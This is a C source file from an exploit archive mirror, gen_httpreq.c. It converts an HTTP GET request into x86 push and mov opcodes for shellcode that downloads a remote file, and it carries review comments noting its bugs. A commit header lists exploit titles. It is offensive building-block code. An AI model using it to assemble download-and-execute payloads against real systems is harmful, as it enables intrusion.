exploit-db-mirror/platforms/generator/shellcode/13288.c
Offensive Security 477bcbdcc0 DB: 2016-03-17
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00


/*
* gen_httpreq.c, utility for generating HTTP/1.x requests for shellcodes
*
* SIZES:
*
* HTTP/1.0 header request size - 18 bytes+
* HTTP/1.1 header request size - 26 bytes+
*
* NOTE: The length of the selected HTTP header is stored at EDX register.
* Thus the generated MOV instruction (to EDX/DX/DL) is size-based.
*
* - izik@tty64.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdarg.h>
#include <string.h>
/* Opcode byte of the x86 `push imm32` instruction; printx emits the request
 * string four bytes at a time with this prefix. */
#define X86_PUSH \
0x68
/* The three macros below print, as a C string literal, a `mov` of the header
 * length into DL, DX or EDX respectively (8-, 16- and 32-bit immediates).
 * NOTE(review): `x` is not parenthesized inside any expansion, and every
 * expansion ends in its own `;`, so they are only safe with a plain identifier
 * or literal used as a statement on its own -- which is how printx calls them
 * (`X86_MOV_TO_DL(tot_length);`). */
#define X86_MOV_TO_DL(x) \
printf("\t\"\\xb2\\x%02x\"\n", x & 0xFF);
#define X86_MOV_TO_DX(x) \
printf("\t\"\\x66\\xba\\x%02x\\x%02x\"\n", \
(x & 0xFF), ((x >> 8) & 0xFF));
#define X86_MOV_TO_EDX(x) \
printf("\t\"\\xba\\x%02x\\x%02x\\x%02x\\x%02x\"\n", \
(x & 0xFF), ((x >> 8) & 0xFF), ((x >> 16) & 0xFF), ((x >> 24) & 0xFF));
/* Prints the command line synopsis (defined below main). */
void usage(char *);
/* Formats the request and prints it as push/mov instructions; returns 1 on
 * success, -1 on allocation failure (defined below usage). */
int printx(char *fmt, ...);
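/*
 * main, validate the command line and hand the selected request template to printx
 * * argc, argv - standard command line: argv[1] picks the protocol (-0 or -1),
 *   argv[2] is the request path (must start with '/'), argv[3] is the Host
 *   value and is only required for -1
 * Returns -1 on a usage error, otherwise whatever printx returns (printx
 * returns 1 after printing, so the process exit status is non-zero even when
 * generation succeeded).
 */
int main(int argc, char **argv) {
	/* argv[2] is dereferenced below, so both the protocol flag and the path
	   are required: with the former `argc < 2` test a single argument left
	   argv[2] NULL and the program crashed instead of printing the usage. */
	if (argc < 3) {
		usage(argv[0]);
		return -1;
	}
	if (argv[2][0] != '/') {
		fprintf(stderr, "filename must begin with '/' as any sane URL! (e.g. /index.html)\n");
		return -1;
	}
	if (!strcmp(argv[1], "-0")) {
		return printx("GET %s HTTP/1.0\r\n\r\n", argv[2]);
	}
	if (!strcmp(argv[1], "-1")) {
		/* the Host header is mandatory in HTTP/1.1, so -1 needs exactly four arguments */
		if (argc != 4) {
			fprintf(stderr, "missing <host>, required parameter for HTTP/1.1 header! (e.g. www.tty64.org)\n");
			return -1;
		}
		return printx("GET %s HTTP/1.1\r\nHost: %s\r\n\r\n", argv[2], argv[3]);
	}
	fprintf(stderr, "%s: unknown http protocol, try -0 or -1\n", argv[1]);
	return -1;
}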
/*
* usage, display usage screen
* * basename, borrowed argv[0]
*/
/*
 * usage, write the command line synopsis to stdout
 * * basename, the program name as given in argv[0]; it is the only value
 *   interpolated, the remaining lines are fixed text
 */
void usage(char *basename) {
	printf("usage: %s <-0|-1> <filename> [<host>]\n\n", basename);
	fputs("\t -0, HTTP/1.0 GET request\n"
	      "\t -1, HTTP/1.1 GET request\n"
	      "\t <filename>, given filename (e.g. /shellcode.bin)\n"
	      "\t <host>, given hostname (e.g. www.tty64.org) [required for HTTP 1.1]\n\n",
	      stdout);
}
/*
* printx, fmt string. generate the shellcode chunk
* * fmt, given format string
*/
/*
 * printx, format the request string, pad it to a multiple of four bytes and
 * print it as a series of x86 `push imm32` instructions followed by a `mov` of
 * the total length into DL, DX or EDX (see the macros above).
 * * fmt, printf-style format; the variadic arguments are the path and, for
 *   HTTP/1.1, the host that main passes through
 * Returns 1 after printing, -1 if the padded copy could not be allocated.
 * All output goes to stdout; the summary lines (URL, lengths) come first.
 */
int printx(char *fmt, ...) {
va_list ap;
char buf[256], pad_buf[4], *w_buf;
int pad_length, buf_length, i, tot_length;
memset(buf, 0x0, sizeof(buf));
va_start(ap, fmt);
// vsnprintf silently truncates a request longer than 255 bytes; nothing below checks for that.
vsnprintf(buf, sizeof(buf), fmt, ap);
va_end(ap);
buf_length = strlen(buf);
printf("\nURL: %s\n", buf);
printf("Header Length: %d bytes\n", buf_length);
// Find the smallest multiple of four that is >= buf_length: the last iteration
// leaves pad_length = (i+1)*4 - buf_length, i.e. 0..3 bytes of padding.
// NOTE(review): the loop body never runs when buf_length <= 4, so pad_length is
// read uninitialized below in that case. The shortest request main can produce
// ("GET / HTTP/1.0\r\n\r\n") is 18 bytes, so main cannot reach it, but a direct
// caller with a short format could.
for (i = 1; buf_length > (i * 4); i++) {
pad_length = ((i+1)*4) - buf_length;
}
printf("Padding Length: %d bytes\n\n", pad_length);
tot_length = buf_length + pad_length;
w_buf = buf;
if (pad_length) {
// Build a padded copy: the extra '/' bytes are inserted right after the first
// '/' of the request (the start of the path), so the URL becomes "GET ///path"
// and is still valid. Such runs of consecutive slashes directly after "GET " are
// visible in web-server access logs.
w_buf = calloc(tot_length, sizeof(char));
if (!w_buf) {
perror("calloc");
return -1;
}
// index() is the legacy BSD spelling of strchr(); it returns NULL when there is
// no '/', which would leave i meaningless -- main guarantees the path starts
// with '/', so the first slash is the one following "GET ".
i = index(buf, '/') - buf;
memset(pad_buf, 0x2f, sizeof(pad_buf)); // 0x2f is '/'
memcpy(w_buf, buf, i);
memcpy(w_buf+i, pad_buf, pad_length);
memcpy(w_buf+pad_length+i, buf+i, buf_length - i);
}
// Emit the padded string last 4-byte group first, so that the sequence of
// pushes lays the bytes out in their original order. tot_length is a multiple
// of four at this point, so i-3 never drops below zero.
// NOTE(review): w_buf is plain char; with %02x a byte >= 0x80 prints
// sign-extended on platforms where char is signed. Not reachable with ASCII
// paths and hosts, but a cast to unsigned char would make the output exact.
for (i = tot_length - 1; i > -1; i-=4) {
printf("\t\"\\x%02x\\x%02x\\x%02x\\x%02x\\x%02x\" // pushl $0x%02x%02x%02x%02x\n",
X86_PUSH, w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i], w_buf[i-3], w_buf[i-2], w_buf[i-1], w_buf[i]);
}
if (pad_length) {
free(w_buf);
}
//
// The EDX register is assumed to be zero-out within the shellcode.
//
// buf holds at most 255 bytes, so tot_length is at most 256: the DL form is used
// for every request except a 256-byte one, which takes the DX form.
if (tot_length < 256) {
// 8bit value
X86_MOV_TO_DL(tot_length);
// NOTE(review): 655356 looks like a typo for 65536 (0x10000); with the 256-byte
// buffer the EDX branch is unreachable either way.
} else if (tot_length < 655356) {
// 16bit value
X86_MOV_TO_DX(tot_length);
} else {
// 32bit value, rarely but possible ;-)
X86_MOV_TO_EDX(tot_length);
}
fputc('\n', stdout);
// main returns this value directly, so a successful run exits with status 1.
return 1;
}
// milw0rm.com [2006-10-22]